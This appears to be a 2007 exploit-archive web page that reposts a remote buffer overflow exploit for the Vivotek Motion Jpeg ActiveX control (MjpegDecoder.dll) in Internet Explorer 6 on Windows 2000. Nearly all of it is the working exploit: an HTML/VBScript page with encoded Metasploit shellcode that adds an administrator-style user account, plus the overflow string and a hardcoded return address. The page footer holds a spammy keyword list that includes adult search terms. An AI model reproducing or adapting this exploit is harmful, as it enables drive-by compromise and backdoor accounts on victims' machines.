about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Vivotek Motion Jpeg Control (MjpegDecoder.dll 2.0.0.13) Remote Exploit




2007-06-03 Vivotek Motion Jpeg Control (MjpegDecoder.dll 2.0.0.13) Remote Exploit 
Rated as : High Risk

<!-- IE 6 / Vivotek Motion Jpeg Control (MjpegDecoder.dll 2.0.0.13)
remote buffer overflow exploit / win 2k sp4 en version
by rgod
site: retrogod.altervista.org

software site: http://www.vivotek.com/
"VIVOTEK INC. is a leading IP surveillance camera and Network
camera firm specialized in IP camera, Wireless network camera,
IP surveillance camera"

some notes,
PtzUrl property is vulnerable to a stack based buffer overflow
we are in control of EIP, ESI, EDI, EBP , *all* in UNICODE
expanded strings
I used the "venetian method" to fully patch the shellcode
This works from remote (2 on 3) or by dragging the html file
into the browser window, not by clicking it

Object safety report:

RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: False
-->
<HTML>
<OBJECT classid='clsid:EAA105FE-7BBD-4196-8B96-D46743894195'
id='MjpegControl' ></OBJECT>
<script language='vbscript'>

' metasploit one, alpha2... add a user 'sun' with pass 'tzu'
FRAGMENT =
unescape("%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%71%40%71%40%71%40%71%40%71%40%72%40%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%eb%59%05%f8%ff%49%49%49%49%49%49%49%49%49%51%6a%58%30%31%42%42%78%42%42%41%30%41%50%42%75%39%6c%48%44%70%70%50%4b%35%6c%4b%6c%65%58%31%6f%4b%6f%38%4b%4f%70%61%6b%69%6b%34%6b%51%6e%31%70%79%6c%64%30%64%37%31%7a%4d%51%72%6b%54%4b%34%44%64%65%45%6b%4f%44%31%6b%66%4b%6c%6b%4b%6f%4c%71%4b%4b%4c%6b%51%4b%79%6c%54%74%73%61%50%64%4b%70%50%75%70%58%6c%4b%50%6c%6b%50%6c%4d%6b%38%48%4b%79%6b%30%50%70%30%70%4b%78%4c%6f%41%46%50%46%69%58%53%70%6b%50%48%6e%38%72%53%38%78%4e%6a%4e%37%6f%47%73%6d%44%4e%35%38%45%50%6f%43%30%4e%45%34%30%55%33%75%42%70%43%65%4e%50%54%58%35%70%4f%61%44%34%50%56%56%50%4e%55%64%50%6c%6f%63%51%4c%47%72%6f%75%70%30%71%44%6d%49%6e%79%73%74%62%41%64%6f%62%63%50%33%65%4e%50%6f%71%34%74%50%c3")

c1 = unescape("%95")                : REM xchg eax, ebp
C2 = unescape("%6e%05%ff%02")       : REM add eax 0200ff00h
C3 = unescape("%6e%2d%12%02")       : REM sub eax 02001200h
C4 = unescape("%6e%40%6e")          : REM inc eax
C5 = unescape("%80%90%6e%40%6e%40") : REM add byte ptr eax 90 ,
inc eax twice
C6 = unescape("%6e%80%90%6e%40%6e%40") : REM and again ... add
byte ptr esi works as nop

CODE = C1 & C2 & C3 & C4 & C5 & C6 & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%03%6e%40%6e%40") & _
unescape("%6e%80%eb%6e%40%6e%40%6e%80%e8%6e%40%6e%40") & _
unescape("%6e%80%ff%6e%40%6e%40%6e%80%ff%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%49%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%49%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%49%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%49%6e%40%6e%40") & _
unescape("%6e%80%37%6e%40%6e%40%6e%80%5a%6e%40%6e%40") & _
unescape("%6e%80%68%6e%40%6e%40%6e%80%50%6e%40%6e%40") & _
unescape("%6e%80%41%6e%40%6e%40%6e%80%41%6e%40%6e%40") & _
unescape("%6e%80%6b%6e%40%6e%40%6e%80%41%6e%40%6e%40") & _
unescape("%6e%80%32%6e%40%6e%40%6e%80%42%6e%40%6e%40") & _
unescape("%6e%80%32%6e%40%6e%40%6e%80%41%6e%40%6e%40") & _
unescape("%6e%80%41%6e%40%6e%40%6e%80%58%6e%40%6e%40") & _
unescape("%6e%80%38%6e%40%6e%40%6e%80%42%6e%40%6e%40") & _
unescape("%6e%80%6d%6e%40%6e%40%6e%80%69%6e%40%6e%40") & _
unescape("%6e%80%4a%6e%40%6e%40%6e%80%70%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%57%6e%40%6e%40") & _
unescape("%6e%80%35%6e%40%6e%40%6e%80%6c%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%55%6e%40%6e%40") & _
unescape("%6e%80%4c%6e%40%6e%40%6e%80%41%6e%40%6e%40") & _
unescape("%6e%80%46%6e%40%6e%40%6e%80%32%6e%40%6e%40") & _
unescape("%6e%80%33%6e%40%6e%40%6e%80%48%6e%40%6e%40") & _
unescape("%6e%80%6c%6e%40%6e%40%6e%80%52%6e%40%6e%40") & _
unescape("%6e%80%72%6e%40%6e%40%6e%80%4c%6e%40%6e%40") & _
unescape("%6e%80%61%6e%40%6e%40%6e%80%75%6e%40%6e%40") & _
unescape("%6e%80%76%6e%40%6e%40%6e%80%58%6e%40%6e%40") & _
unescape("%6e%80%52%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%50%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%55%6e%40%6e%40%6e%80%58%6e%40%6e%40") & _
unescape("%6e%80%70%6e%40%6e%40%6e%80%6b%6e%40%6e%40") & _
unescape("%6e%80%4e%6e%40%6e%40%6e%80%6c%6e%40%6e%40") & _
unescape("%6e%80%6e%6e%40%6e%40%6e%80%6f%6e%40%6e%40") & _
unescape("%6e%80%51%6e%40%6e%40%6e%80%33%6e%40%6e%40") & _
unescape("%6e%80%6f%6e%40%6e%40%6e%80%4b%6e%40%6e%40") & _
unescape("%6e%80%44%6e%40%6e%40%6e%80%65%6e%40%6e%40") & _
unescape("%6e%80%6b%6e%40%6e%40%6e%80%38%6e%40%6e%40") & _
unescape("%6e%80%4a%6e%40%6e%40%6e%80%77%6e%40%6e%40") & _
unescape("%6e%80%36%6e%40%6e%40%6e%80%76%6e%40%6e%40") & _
unescape("%6e%80%56%6e%40%6e%40%6e%80%51%6e%40%6e%40") & _
unescape("%6e%80%4a%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%61%6e%40%6e%40%6e%80%66%6e%40%6e%40") & _
unescape("%6e%80%43%6e%40%6e%40%6e%80%48%6e%40%6e%40") & _
unescape("%6e%80%50%6e%40%6e%40%6e%80%6c%6e%40%6e%40") & _
unescape("%6e%80%36%6e%40%6e%40%6e%80%62%6e%40%6e%40") & _
unescape("%6e%80%6c%6e%40%6e%40%6e%80%33%6e%40%6e%40") & _
unescape("%6e%80%55%6e%40%6e%40%6e%80%67%6e%40%6e%40") & _
unescape("%6e%80%7a%6e%40%6e%40%6e%80%4c%6e%40%6e%40") & _
unescape("%6e%80%75%6e%40%6e%40%6e%80%4e%6e%40%6e%40") & _
unescape("%6e%80%75%6e%40%6e%40%6e%80%4a%6e%40%6e%40") & _
unescape("%6e%80%4f%6e%40%6e%40%6e%80%43%6e%40%6e%40") & _
unescape("%6e%80%77%6e%40%6e%40%6e%80%67%6e%40%6e%40") & _
unescape("%6e%80%4b%6e%40%6e%40%6e%80%55%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%30%6e%40%6e%40") & _
unescape("%6e%80%6c%6e%40%6e%40%6e%80%43%6e%40%6e%40") & _
unescape("%6e%80%66%6e%40%6e%40%6e%80%6f%6e%40%6e%40") & _
unescape("%6e%80%6b%6e%40%6e%40%6e%80%32%6e%40%6e%40") & _
unescape("%6e%80%66%6e%40%6e%40%6e%80%4c%6e%40%6e%40") & _
unescape("%6e%80%51%6e%40%6e%40%6e%80%46%6e%40%6e%40") & _
unescape("%6e%80%6e%6e%40%6e%40%6e%80%42%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%6e%6e%40%6e%40%6e%80%45%6e%40%6e%40") & _
unescape("%6e%80%54%6e%40%6e%40%6e%80%7a%6e%40%6e%40") & _
unescape("%6e%80%37%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%4b%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%53%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%4c%6e%40%6e%40") & _
unescape("%6e%80%71%6e%40%6e%40%6e%80%77%6e%40%6e%40") & _
unescape("%6e%80%53%6e%40%6e%40%6e%80%47%6e%40%6e%40") & _
unescape("%6e%80%6b%6e%40%6e%40%6e%80%73%6e%40%6e%40") & _
unescape("%6e%80%51%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%6a%6e%40%6e%40%6e%80%4d%6e%40%6e%40") & _
unescape("%6e%80%4b%6e%40%6e%40%6e%80%61%6e%40%6e%40") & _
unescape("%6e%80%30%6e%40%6e%40%6e%80%32%6e%40%6e%40") & _
unescape("%6e%80%61%6e%40%6e%40%6e%80%4e%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%32%6e%40%6e%40") & _
unescape("%6e%80%55%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%4b%6e%40%6e%40%6e%80%4e%6e%40%6e%40") & _
unescape("%6e%80%64%6e%40%6e%40%6e%80%46%6e%40%6e%40") & _
unescape("%6e%80%59%6e%40%6e%40%6e%80%7a%6e%40%6e%40") & _
unescape("%6e%80%51%6e%40%6e%40%6e%80%30%6e%40%6e%40") & _
unescape("%6e%80%62%6e%40%6e%40%6e%80%66%6e%40%6e%40") & _
unescape("%6e%80%55%6e%40%6e%40%6e%80%64%6e%40%6e%40") & _
unescape("%6e%80%62%6e%40%6e%40%6e%80%67%6e%40%6e%40") & _
unescape("%6e%80%54%6e%40%6e%40%6e%80%52%6e%40%6e%40") & _
unescape("%6e%80%51%6e%40%6e%40%6e%80%72%6e%40%6e%40") & _
unescape("%6e%80%32%6e%40%6e%40%6e%80%74%6e%40%6e%40") & _
unescape("%6e%80%71%6e%40%6e%40%6e%80%52%6e%40%6e%40") & _
unescape("%6e%80%74%6e%40%6e%40%6e%80%61%6e%40%6e%40") & _
unescape("%6e%80%53%6e%40%6e%40%6e%80%35%6e%40%6e%40") & _
unescape("%6e%80%53%6e%40%6e%40%6e%80%31%6e%40%6e%40") & _
unescape("%6e%80%72%6e%40%6e%40%6e%80%57%6e%40%6e%40") & _
unescape("%6e%80%62%6e%40%6e%40%6e%80%72%6e%40%6e%40") & _
unescape("%6e%80%54%6e%40%6e%40%6e%80%65%6e%40%6e%40") & _
unescape("%6e%80%36%6e%40%6e%40%6e%80%52%6e%40%6e%40") & _
unescape("%6e%80%50%6e%40%6e%40%6e%80%67%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%37%6e%40%6e%40") & _
unescape("%6e%80%77%6e%40%6e%40%6e%80%37%6e%40%6e%40") & _
unescape("%6e%80%72%6e%40%6e%40%6e%80%33%6e%40%6e%40") & _
unescape("%6e%80%31%6e%40%6e%40%6e%80%77%6e%40%6e%40") & _
unescape("%6e%80%50%6e%40%6e%40%6e%80%70%6e%40%6e%40") & _
unescape("%6e%80%70%6e%40%6e%40%6e%80%73%6e%40%6e%40") & _
unescape("%6e%80%62%6e%40%6e%40%6e%80%52%6e%40%6e%40") & _
unescape("%6e%80%30%6e%40%6e%40%6e%80%70%6e%40%6e%40") & _
unescape("%6e%80%70%6e%40%6e%40%6e%80%30%6e%40%6e%40") & _
unescape("%6e%80%61%6e%40%6e%40%6e%80%33%6e%40%6e%40") & _
unescape("%6e%80%62%6e%40%6e%40%6e%80%70%6e%40%6e%40") & _
unescape("%6e%80%42%6e%40%6e%40%6e%80%70%6e%40%6e%40") & _
unescape("%6e%80%61%6e%40%6e%40%6e%80%50%6e%40%6e%40") & _
unescape("%6e%80%70%6e%40%6e%40%6e%80%31%6e%40%6e%40") & _
unescape("%6e%80%32%6e%40%6e%40%6e%80%31%6e%40%6e%40") & _
unescape("%6e%80%70%6e%40%6e%40%6e%80%41%6e%40%6e%40") & _
unescape("%6e%80%71%6e%40%6e%40%6e%80%57%6e%40%6e%40") & _
unescape("%6e%80%74%6e%40%6e%40%6e%80%61%6e%40%6e%40") & _
unescape("%6e%80%32%6e%40%6e%40%6e%80%57%6e%40%6e%40") & _
unescape("%6e%80%64%6e%40%6e%40%6e%80%53%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%63%6e%40%6e%40") & _
unescape("%6e%80%75%6e%40%6e%40%6e%80%90%6e%40%6e%40%6e%40%6e")

bof         = string(262,unescape("%12"))
useful_junk = unescape("%12%12%12%12") 'not touch
junk        = string(32,unescape("%12"))
eip         = unescape("%23%7d") : REM 0x007d0023   call edi, 
module comctl32 found with msfpescan
suntzu      = bof + eip + useful_junk + junk + CODE + FRAGMENT +
string(16,unescape("%90"))

MjpegControl.PtzUrl = suntzu

</script>
</HTML>


securitydot.net - 2007-06-03

Advertising

Copyright 2007, SecurityDot
Sun, 07 Sep 2008 01:08:35 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
t675t php-nuke 2 /component CMS is Fre t992t CMS is Fre asx news for C imagen dig ipb+hack news for c CMS is Fre Free downl bigboos phpBB por video bugi Kareensexy news for c Free boy s ip board 2 news for c news for c MiaCMS celeb hot. My Love mod_SSL lo news for c www.trish www.photos Love ratin MAN news for c werew+ news for c 200 /compo news for C free vedio code execu news for c WWW+sexygi news for c php-nuke 2 teenboysse www.seks b t35t PHP 4 apac WWW.Pink w celeb porn www naruto CVE-2006-3